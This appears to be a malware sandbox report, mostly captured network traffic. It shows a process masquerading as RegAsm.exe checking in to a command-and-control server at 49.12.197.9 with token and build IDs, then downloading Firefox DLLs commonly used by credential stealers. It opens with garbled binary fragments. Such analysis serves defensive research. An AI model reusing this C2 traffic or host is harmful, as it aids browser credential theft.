9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49779	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:45 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:45 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------BKFCAFCFBAEHIDHJDBGCCont
2024-10-02 07:41:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:46 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49780	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:47 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGCGHIDHCBFHIDGHCBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:47 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------EBGCGHIDHCBFHIDGHCBKCont
2024-10-02 07:41:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:48 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49781	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:48 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:48 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AFHDBGHJKFIDHJJJEBKECont
2024-10-02 07:41:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49782	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:49 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:49 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CAAKKFHCFIECAAAKEGCFCont
2024-10-02 07:41:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:50 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49783	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:50 UTC	195	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:50 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:50 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:50 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:50 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-10-02 07:41:50 UTC	16384	IN	Data Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-10-02 07:41:50 UTC	16384	IN	Data Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-10-02 07:41:50 UTC	16384	IN	Data Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-10-02 07:41:50 UTC	16384	IN	Data Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-10-02 07:41:51 UTC	16384	IN	Data Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-10-02 07:41:51 UTC	16384	IN	Data Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-10-02 07:41:51 UTC	16384	IN	Data Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-10-02 07:41:51 UTC	16384	IN	Data Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-10-02 07:41:51 UTC	16384	IN	Data Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49784	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:52 UTC	195	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:52 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:52 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:52 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:52 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d Data Ascii: 